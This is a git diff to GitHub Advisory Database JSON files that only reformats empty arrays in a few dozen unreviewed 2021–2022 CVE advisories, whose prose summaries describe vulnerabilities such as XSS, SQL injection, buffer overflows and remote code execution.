a/advisories/unreviewed/2021/12/GHSA-c5w9-76vp-fjvx/GHSA-c5w9-76vp-fjvx.json b/advisories/unreviewed/2021/12/GHSA-c5w9-76vp-fjvx/GHSA-c5w9-76vp-fjvx.json index 36592151bde..1add0709e56 100644 --- a/advisories/unreviewed/2021/12/GHSA-c5w9-76vp-fjvx/GHSA-c5w9-76vp-fjvx.json +++ b/advisories/unreviewed/2021/12/GHSA-c5w9-76vp-fjvx/GHSA-c5w9-76vp-fjvx.json @@ -7,12 +7,8 @@ "CVE-2021-45090" ], "details": "Stormshield Endpoint Security before 2.1.2 allows remote code execution.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2021/12/GHSA-cg8f-cgq8-xchm/GHSA-cg8f-cgq8-xchm.json b/advisories/unreviewed/2021/12/GHSA-cg8f-cgq8-xchm/GHSA-cg8f-cgq8-xchm.json index 6906804b204..c803276d917 100644 --- a/advisories/unreviewed/2021/12/GHSA-cg8f-cgq8-xchm/GHSA-cg8f-cgq8-xchm.json +++ b/advisories/unreviewed/2021/12/GHSA-cg8f-cgq8-xchm/GHSA-cg8f-cgq8-xchm.json @@ -7,12 +7,8 @@ "CVE-2021-24907" ], "details": "The Contact Form, Drag and Drop Form Builder for WordPress plugin before 1.8.0 does not escape the status parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-g47h-745c-4p4f/GHSA-g47h-745c-4p4f.json b/advisories/unreviewed/2021/12/GHSA-g47h-745c-4p4f/GHSA-g47h-745c-4p4f.json index 22ec7a89a8b..d4490b4925b 100644 --- a/advisories/unreviewed/2021/12/GHSA-g47h-745c-4p4f/GHSA-g47h-745c-4p4f.json +++ b/advisories/unreviewed/2021/12/GHSA-g47h-745c-4p4f/GHSA-g47h-745c-4p4f.json @@ -7,12 +7,8 @@ "CVE-2021-24981" ], "details": "The Directorist WordPress plugin before 7.0.6.2 was vulnerable to Cross-Site Request Forgery to Remote File Upload leading to arbitrary PHP shell uploads in the wp-content/plugins directory.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-jjmw-3x38-cvq5/GHSA-jjmw-3x38-cvq5.json b/advisories/unreviewed/2021/12/GHSA-jjmw-3x38-cvq5/GHSA-jjmw-3x38-cvq5.json index 2d50dfe4065..0d12738626d 100644 --- a/advisories/unreviewed/2021/12/GHSA-jjmw-3x38-cvq5/GHSA-jjmw-3x38-cvq5.json +++ b/advisories/unreviewed/2021/12/GHSA-jjmw-3x38-cvq5/GHSA-jjmw-3x38-cvq5.json @@ -7,12 +7,8 @@ "CVE-2021-24578" ], "details": "The SportsPress WordPress plugin before 2.7.9 does not sanitise and escape its match_day parameter before outputting back in the Events backend page, leading to a Reflected Cross-Site Scripting issue", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-jm24-qrrg-77rv/GHSA-jm24-qrrg-77rv.json b/advisories/unreviewed/2021/12/GHSA-jm24-qrrg-77rv/GHSA-jm24-qrrg-77rv.json index 9b5093603b0..e106b7e1a1b 100644 --- a/advisories/unreviewed/2021/12/GHSA-jm24-qrrg-77rv/GHSA-jm24-qrrg-77rv.json +++ b/advisories/unreviewed/2021/12/GHSA-jm24-qrrg-77rv/GHSA-jm24-qrrg-77rv.json @@ -7,12 +7,8 @@ "CVE-2021-24738" ], "details": "The Logo Carousel WordPress plugin before 3.4.2 does not validate and escape the \"Logo Margin\" carousel option, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-mhfc-h92x-3f8m/GHSA-mhfc-h92x-3f8m.json b/advisories/unreviewed/2021/12/GHSA-mhfc-h92x-3f8m/GHSA-mhfc-h92x-3f8m.json index 13d104a4a00..3b18b66ecac 100644 --- a/advisories/unreviewed/2021/12/GHSA-mhfc-h92x-3f8m/GHSA-mhfc-h92x-3f8m.json +++ b/advisories/unreviewed/2021/12/GHSA-mhfc-h92x-3f8m/GHSA-mhfc-h92x-3f8m.json @@ -7,12 +7,8 @@ "CVE-2021-36336" ], "details": "Wyse Management Suite 3.3.1 and below versions contain a deserialization vulnerability that could allow an unauthenticated attacker to execute code on the affected system.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-mv38-79cw-m7w5/GHSA-mv38-79cw-m7w5.json b/advisories/unreviewed/2021/12/GHSA-mv38-79cw-m7w5/GHSA-mv38-79cw-m7w5.json index f976e6570f7..5d4434c16e6 100644 --- a/advisories/unreviewed/2021/12/GHSA-mv38-79cw-m7w5/GHSA-mv38-79cw-m7w5.json +++ b/advisories/unreviewed/2021/12/GHSA-mv38-79cw-m7w5/GHSA-mv38-79cw-m7w5.json @@ -7,12 +7,8 @@ "CVE-2021-24846" ], "details": "The get_query() function of the Ni WooCommerce Custom Order Status WordPress plugin before 1.9.7, used by the niwoocos_ajax AJAX action, available to all authenticated users, does not properly sanitise the sort parameter before using it in a SQL statement, leading to an SQL injection, exploitable by any authenticated users, such as subscriber", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-mwhh-vwcq-vm7h/GHSA-mwhh-vwcq-vm7h.json b/advisories/unreviewed/2021/12/GHSA-mwhh-vwcq-vm7h/GHSA-mwhh-vwcq-vm7h.json index 9cff0cd84d4..509842842ec 100644 --- a/advisories/unreviewed/2021/12/GHSA-mwhh-vwcq-vm7h/GHSA-mwhh-vwcq-vm7h.json +++ b/advisories/unreviewed/2021/12/GHSA-mwhh-vwcq-vm7h/GHSA-mwhh-vwcq-vm7h.json @@ -7,12 +7,8 @@ "CVE-2021-24941" ], "details": "The Popups, Welcome Bar, Optins and Lead Generation Plugin WordPress plugin before 2.0.5 does not sanitise and escape the message_id parameter of the get_message_action_row AJAX action before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-p7vc-9g4v-42gh/GHSA-p7vc-9g4v-42gh.json b/advisories/unreviewed/2021/12/GHSA-p7vc-9g4v-42gh/GHSA-p7vc-9g4v-42gh.json index 188faa688f4..a683a2f8e69 100644 --- a/advisories/unreviewed/2021/12/GHSA-p7vc-9g4v-42gh/GHSA-p7vc-9g4v-42gh.json +++ b/advisories/unreviewed/2021/12/GHSA-p7vc-9g4v-42gh/GHSA-p7vc-9g4v-42gh.json @@ -7,12 +7,8 @@ "CVE-2021-3095" ], "details": "A remote attacker with write access to PI Vision could inject code into a display. Unauthorized information disclosure, modification, or deletion is possible if a victim views or interacts with the infected display using Microsoft Internet Explorer. The impact affects PI System data and other data accessible with victim’s user permissions.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2021/12/GHSA-p934-c89c-rc2m/GHSA-p934-c89c-rc2m.json b/advisories/unreviewed/2021/12/GHSA-p934-c89c-rc2m/GHSA-p934-c89c-rc2m.json index ce383ba66b8..6262a491a62 100644 --- a/advisories/unreviewed/2021/12/GHSA-p934-c89c-rc2m/GHSA-p934-c89c-rc2m.json +++ b/advisories/unreviewed/2021/12/GHSA-p934-c89c-rc2m/GHSA-p934-c89c-rc2m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-pph6-2c9x-fm9c/GHSA-pph6-2c9x-fm9c.json b/advisories/unreviewed/2021/12/GHSA-pph6-2c9x-fm9c/GHSA-pph6-2c9x-fm9c.json index 1a3a49ec559..9326c597a5c 100644 --- a/advisories/unreviewed/2021/12/GHSA-pph6-2c9x-fm9c/GHSA-pph6-2c9x-fm9c.json +++ b/advisories/unreviewed/2021/12/GHSA-pph6-2c9x-fm9c/GHSA-pph6-2c9x-fm9c.json @@ -7,12 +7,8 @@ "CVE-2021-45461" ], "details": "FreePBX, when restapps (aka Rest Phone Apps) 15.0.19.87, 15.0.19.88, 16.0.18.40, or 16.0.18.41 is installed, allows remote attackers to execute arbitrary code, as exploited in the wild in December 2021. The fixed versions are 15.0.20 and 16.0.19.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2021/12/GHSA-r75m-48xv-39cv/GHSA-r75m-48xv-39cv.json b/advisories/unreviewed/2021/12/GHSA-r75m-48xv-39cv/GHSA-r75m-48xv-39cv.json index 3f8c4e50b11..a31197a5c31 100644 --- a/advisories/unreviewed/2021/12/GHSA-r75m-48xv-39cv/GHSA-r75m-48xv-39cv.json +++ b/advisories/unreviewed/2021/12/GHSA-r75m-48xv-39cv/GHSA-r75m-48xv-39cv.json @@ -7,12 +7,8 @@ "CVE-2021-44471" ], "details": "DIAEnergie Version 1.7.5 and prior is vulnerable to stored cross-site scripting when an unauthenticated user injects arbitrary code into the parameter “name” of the script “DIAE_HandlerAlarmGroup.ashx”.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-r9vp-7326-28qj/GHSA-r9vp-7326-28qj.json b/advisories/unreviewed/2021/12/GHSA-r9vp-7326-28qj/GHSA-r9vp-7326-28qj.json index 0a2c2a4a3bf..326a0cd6997 100644 --- a/advisories/unreviewed/2021/12/GHSA-r9vp-7326-28qj/GHSA-r9vp-7326-28qj.json +++ b/advisories/unreviewed/2021/12/GHSA-r9vp-7326-28qj/GHSA-r9vp-7326-28qj.json @@ -7,12 +7,8 @@ "CVE-2021-45255" ], "details": "The email parameter from ajax.php of Video Sharing Website 1.0 appears to be vulnerable to SQL injection attacks. A payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-rcc4-26h9-5ggq/GHSA-rcc4-26h9-5ggq.json b/advisories/unreviewed/2021/12/GHSA-rcc4-26h9-5ggq/GHSA-rcc4-26h9-5ggq.json index 83ddd4ecbcf..46a18be3c9d 100644 --- a/advisories/unreviewed/2021/12/GHSA-rcc4-26h9-5ggq/GHSA-rcc4-26h9-5ggq.json +++ b/advisories/unreviewed/2021/12/GHSA-rcc4-26h9-5ggq/GHSA-rcc4-26h9-5ggq.json @@ -7,12 +7,8 @@ "CVE-2021-39306" ], "details": "A stack buffer overflow was discovered on Realtek RTL8195AM device before 2.0.10, it exists in the client code when an attacker sends a big size Authentication challenge text in WEP security.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-vgc6-7rq7-5j57/GHSA-vgc6-7rq7-5j57.json b/advisories/unreviewed/2021/12/GHSA-vgc6-7rq7-5j57/GHSA-vgc6-7rq7-5j57.json index c22b6c273e3..0347bf40b72 100644 --- a/advisories/unreviewed/2021/12/GHSA-vgc6-7rq7-5j57/GHSA-vgc6-7rq7-5j57.json +++ b/advisories/unreviewed/2021/12/GHSA-vgc6-7rq7-5j57/GHSA-vgc6-7rq7-5j57.json @@ -7,12 +7,8 @@ "CVE-2021-3090" ], "details": "PI Vision could disclose information to a user with insufficient privileges for an AF attribute that is the child of another attribute and is configured as a Limits property.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-w9qr-g73g-88cw/GHSA-w9qr-g73g-88cw.json b/advisories/unreviewed/2021/12/GHSA-w9qr-g73g-88cw/GHSA-w9qr-g73g-88cw.json index e62ae4601e0..a075b5d9147 100644 --- a/advisories/unreviewed/2021/12/GHSA-w9qr-g73g-88cw/GHSA-w9qr-g73g-88cw.json +++ b/advisories/unreviewed/2021/12/GHSA-w9qr-g73g-88cw/GHSA-w9qr-g73g-88cw.json @@ -7,12 +7,8 @@ "CVE-2021-36337" ], "details": "Dell Wyse Management Suite version 3.3.1 and prior support insecure Transport Security Protocols TLS 1.0 and TLS 1.1 which are susceptible to Man-In-The-Middle attacks thereby compromising Confidentiality and Integrity of data.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-wrmw-qgfp-5p47/GHSA-wrmw-qgfp-5p47.json b/advisories/unreviewed/2021/12/GHSA-wrmw-qgfp-5p47/GHSA-wrmw-qgfp-5p47.json index 73ee0751537..2f676527ca7 100644 --- a/advisories/unreviewed/2021/12/GHSA-wrmw-qgfp-5p47/GHSA-wrmw-qgfp-5p47.json +++ b/advisories/unreviewed/2021/12/GHSA-wrmw-qgfp-5p47/GHSA-wrmw-qgfp-5p47.json @@ -7,12 +7,8 @@ "CVE-2021-36316" ], "details": "Dell EMC Avamar Server versions 18.2, 19.1, 19.2, 19.3, and 19.4 contain an improper privilege management vulnerability in AUI. A malicious user with high privileges could potentially exploit this vulnerability, leading to the disclosure of the AUI info and performing some unauthorized operation on the AUI.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2021/12/GHSA-xhwc-8q63-685m/GHSA-xhwc-8q63-685m.json b/advisories/unreviewed/2021/12/GHSA-xhwc-8q63-685m/GHSA-xhwc-8q63-685m.json index 625e3ed47b9..506177bda9f 100644 --- a/advisories/unreviewed/2021/12/GHSA-xhwc-8q63-685m/GHSA-xhwc-8q63-685m.json +++ b/advisories/unreviewed/2021/12/GHSA-xhwc-8q63-685m/GHSA-xhwc-8q63-685m.json @@ -7,12 +7,8 @@ "CVE-2021-36350" ], "details": "Dell PowerScale OneFS, versions 8.2.2-9.3.0.x, contain an authentication bypass by primary weakness in one of the authentication factors. A remote unauthenticated attacker may potentially exploit this vulnerability and bypass one of the factors of authentication.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-6jcp-qjgw-2fcj/GHSA-6jcp-qjgw-2fcj.json b/advisories/unreviewed/2022/01/GHSA-6jcp-qjgw-2fcj/GHSA-6jcp-qjgw-2fcj.json index c5bcbc25919..0b7b0bf20d1 100644 --- a/advisories/unreviewed/2022/01/GHSA-6jcp-qjgw-2fcj/GHSA-6jcp-qjgw-2fcj.json +++ b/advisories/unreviewed/2022/01/GHSA-6jcp-qjgw-2fcj/GHSA-6jcp-qjgw-2fcj.json @@ -7,12 +7,8 @@ "CVE-2021-45774" ], "details": "A NULL pointer dereference in help() at inetutils/telnet/commands.c of GNU Inetutils v2.2.16-cf091 can lead to a segmentation fault or application crash.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/01/GHSA-6q78-fg43-5rvv/GHSA-6q78-fg43-5rvv.json b/advisories/unreviewed/2022/01/GHSA-6q78-fg43-5rvv/GHSA-6q78-fg43-5rvv.json index e0f76d8eb8c..7d3f647b64c 100644 --- a/advisories/unreviewed/2022/01/GHSA-6q78-fg43-5rvv/GHSA-6q78-fg43-5rvv.json +++ b/advisories/unreviewed/2022/01/GHSA-6q78-fg43-5rvv/GHSA-6q78-fg43-5rvv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-8vhx-gp64-6786/GHSA-8vhx-gp64-6786.json b/advisories/unreviewed/2022/01/GHSA-8vhx-gp64-6786/GHSA-8vhx-gp64-6786.json index 79aa0c52ca5..9f543dab523 100644 --- a/advisories/unreviewed/2022/01/GHSA-8vhx-gp64-6786/GHSA-8vhx-gp64-6786.json +++ b/advisories/unreviewed/2022/01/GHSA-8vhx-gp64-6786/GHSA-8vhx-gp64-6786.json @@ -7,12 +7,8 @@ "CVE-2021-45779" ], "details": "A NULL pointer dereference in unsetcmd() at inetutils/telnet/commands.c of GNU Inetutils v2.2.16-cf091 can lead to a segmentation fault or application crash.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/01/GHSA-cx3c-h5q9-78vc/GHSA-cx3c-h5q9-78vc.json b/advisories/unreviewed/2022/01/GHSA-cx3c-h5q9-78vc/GHSA-cx3c-h5q9-78vc.json index 5b8047eecc4..9393d5a680f 100644 --- a/advisories/unreviewed/2022/01/GHSA-cx3c-h5q9-78vc/GHSA-cx3c-h5q9-78vc.json +++ b/advisories/unreviewed/2022/01/GHSA-cx3c-h5q9-78vc/GHSA-cx3c-h5q9-78vc.json @@ -7,12 +7,8 @@ "CVE-2021-45778" ], "details": "A NULL pointer dereference in setnmap() at cmds.c of GNU Inetutils v2.2.16-cf091 can lead to a segmentation fault or application crash.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/01/GHSA-frvx-4gh2-28f9/GHSA-frvx-4gh2-28f9.json b/advisories/unreviewed/2022/01/GHSA-frvx-4gh2-28f9/GHSA-frvx-4gh2-28f9.json index dbad027988a..bf3a013688a 100644 --- a/advisories/unreviewed/2022/01/GHSA-frvx-4gh2-28f9/GHSA-frvx-4gh2-28f9.json +++ b/advisories/unreviewed/2022/01/GHSA-frvx-4gh2-28f9/GHSA-frvx-4gh2-28f9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-gc9h-g4qm-fgcv/GHSA-gc9h-g4qm-fgcv.json b/advisories/unreviewed/2022/01/GHSA-gc9h-g4qm-fgcv/GHSA-gc9h-g4qm-fgcv.json index dae66d5fd26..db06a236459 100644 --- a/advisories/unreviewed/2022/01/GHSA-gc9h-g4qm-fgcv/GHSA-gc9h-g4qm-fgcv.json +++ b/advisories/unreviewed/2022/01/GHSA-gc9h-g4qm-fgcv/GHSA-gc9h-g4qm-fgcv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-j4q9-pc8g-hff7/GHSA-j4q9-pc8g-hff7.json b/advisories/unreviewed/2022/01/GHSA-j4q9-pc8g-hff7/GHSA-j4q9-pc8g-hff7.json index 48a50b0ed55..3926bdbb86a 100644 --- a/advisories/unreviewed/2022/01/GHSA-j4q9-pc8g-hff7/GHSA-j4q9-pc8g-hff7.json +++ b/advisories/unreviewed/2022/01/GHSA-j4q9-pc8g-hff7/GHSA-j4q9-pc8g-hff7.json @@ -7,12 +7,8 @@ "CVE-2021-45781" ], "details": "GNU Inetutils 2.2.16-cf091 was discovered to contain a heap-based buffer overflow via the component logger at inetutils/src/logger.c.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/01/GHSA-m7h4-hg4x-w57p/GHSA-m7h4-hg4x-w57p.json b/advisories/unreviewed/2022/01/GHSA-m7h4-hg4x-w57p/GHSA-m7h4-hg4x-w57p.json index dad624a5736..fff572a1e6a 100644 --- a/advisories/unreviewed/2022/01/GHSA-m7h4-hg4x-w57p/GHSA-m7h4-hg4x-w57p.json +++ b/advisories/unreviewed/2022/01/GHSA-m7h4-hg4x-w57p/GHSA-m7h4-hg4x-w57p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-qqc6-6w3j-87qj/GHSA-qqc6-6w3j-87qj.json b/advisories/unreviewed/2022/01/GHSA-qqc6-6w3j-87qj/GHSA-qqc6-6w3j-87qj.json index bac788b0d11..582f96eb76c 100644 --- a/advisories/unreviewed/2022/01/GHSA-qqc6-6w3j-87qj/GHSA-qqc6-6w3j-87qj.json +++ b/advisories/unreviewed/2022/01/GHSA-qqc6-6w3j-87qj/GHSA-qqc6-6w3j-87qj.json @@ -7,12 +7,8 @@ "CVE-2021-45782" ], "details": "An untrusted pointer dereference in getcmd() at inetutils/src/tftp.c of GNU Inetutils v2.2.16-cf091 can lead to a segmentation fault or application crash.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/01/GHSA-rwxp-c37g-r3vj/GHSA-rwxp-c37g-r3vj.json b/advisories/unreviewed/2022/01/GHSA-rwxp-c37g-r3vj/GHSA-rwxp-c37g-r3vj.json index 324d59fc8dc..1873e2d43ce 100644 --- a/advisories/unreviewed/2022/01/GHSA-rwxp-c37g-r3vj/GHSA-rwxp-c37g-r3vj.json +++ b/advisories/unreviewed/2022/01/GHSA-rwxp-c37g-r3vj/GHSA-rwxp-c37g-r3vj.json @@ -7,12 +7,8 @@ "CVE-2021-45959" ], "details": "{fmt} 7.1.0 through 8.0.1 has a stack-based buffer overflow in fmt::v8::detail::dragonbox::umul192_upper64 (called from fmt::v8::detail::dragonbox::cache_accessor::compute_mul and fmt::v8::detail::dragonbox::decimal_fp fmt::v8::detail::dragonbox::to_de).", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/01/GHSA-vf67-35mw-phcj/GHSA-vf67-35mw-phcj.json b/advisories/unreviewed/2022/01/GHSA-vf67-35mw-phcj/GHSA-vf67-35mw-phcj.json index 7cb43098bf9..c2d7bd0b136 100644 --- a/advisories/unreviewed/2022/01/GHSA-vf67-35mw-phcj/GHSA-vf67-35mw-phcj.json +++ b/advisories/unreviewed/2022/01/GHSA-vf67-35mw-phcj/GHSA-vf67-35mw-phcj.json @@ -7,12 +7,8 @@ "CVE-2021-45780" ], "details": "GNU Inetutils commit cf091 was discovered to contain a memory leak via the ifconfig function.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/01/GHSA-wr72-prh2-3825/GHSA-wr72-prh2-3825.json b/advisories/unreviewed/2022/01/GHSA-wr72-prh2-3825/GHSA-wr72-prh2-3825.json index a5490f6495d..1d5f034a94d 100644 --- a/advisories/unreviewed/2022/01/GHSA-wr72-prh2-3825/GHSA-wr72-prh2-3825.json +++ b/advisories/unreviewed/2022/01/GHSA-wr72-prh2-3825/GHSA-wr72-prh2-3825.json @@ -7,12 +7,8 @@ "CVE-2021-45817" ], "details": "Web Viewer for Hanwha DVR version 2.17 is affected by a Cross Site Scripting (XSS) vulnerability that allows an attacker to inject malicious JavaScript codes.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/01/GHSA-xrpg-qv3x-v75v/GHSA-xrpg-qv3x-v75v.json b/advisories/unreviewed/2022/01/GHSA-xrpg-qv3x-v75v/GHSA-xrpg-qv3x-v75v.json index a1a40f3e62d..16c73aa6648 100644 --- a/advisories/unreviewed/2022/01/GHSA-xrpg-qv3x-v75v/GHSA-xrpg-qv3x-v75v.json +++ b/advisories/unreviewed/2022/01/GHSA-xrpg-qv3x-v75v/GHSA-xrpg-qv3x-v75v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/03/GHSA-p522-8wh9-3xmp/GHSA-p522-8wh9-3xmp.json b/advisories/unreviewed/2022/03/GHSA-p522-8wh9-3xmp/GHSA-p522-8wh9-3xmp.json index 36b7d241c0f..ab4fab899e0 100644 --- a/advisories/unreviewed/2022/03/GHSA-p522-8wh9-3xmp/GHSA-p522-8wh9-3xmp.json +++ b/advisories/unreviewed/2022/03/GHSA-p522-8wh9-3xmp/GHSA-p522-8wh9-3xmp.json @@ -7,12 +7,8 @@ "CVE-2022-26487" ], "details": "Mitel MiCollab before 9.4 SP1 FP1 and MiVoice Business Express through 8.1 allow remote attackers to obtain sensitive information and cause a denial of service (performance degradation and excessive outbound traffic).", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/04/GHSA-22xv-75pc-484w/GHSA-22xv-75pc-484w.json b/advisories/unreviewed/2022/04/GHSA-22xv-75pc-484w/GHSA-22xv-75pc-484w.json index e8ddfae7c8e..172c8a0222e 100644 --- a/advisories/unreviewed/2022/04/GHSA-22xv-75pc-484w/GHSA-22xv-75pc-484w.json +++ b/advisories/unreviewed/2022/04/GHSA-22xv-75pc-484w/GHSA-22xv-75pc-484w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-3p48-pw9r-4325/GHSA-3p48-pw9r-4325.json b/advisories/unreviewed/2022/04/GHSA-3p48-pw9r-4325/GHSA-3p48-pw9r-4325.json index f69a39c8cee..d336c2af80f 100644 --- a/advisories/unreviewed/2022/04/GHSA-3p48-pw9r-4325/GHSA-3p48-pw9r-4325.json +++ b/advisories/unreviewed/2022/04/GHSA-3p48-pw9r-4325/GHSA-3p48-pw9r-4325.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-43qr-ph4f-wq48/GHSA-43qr-ph4f-wq48.json b/advisories/unreviewed/2022/04/GHSA-43qr-ph4f-wq48/GHSA-43qr-ph4f-wq48.json index 6c5d828965b..3cd70414a9a 100644 --- a/advisories/unreviewed/2022/04/GHSA-43qr-ph4f-wq48/GHSA-43qr-ph4f-wq48.json +++ b/advisories/unreviewed/2022/04/GHSA-43qr-ph4f-wq48/GHSA-43qr-ph4f-wq48.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/04/GHSA-45g9-98w8-8m3w/GHSA-45g9-98w8-8m3w.json 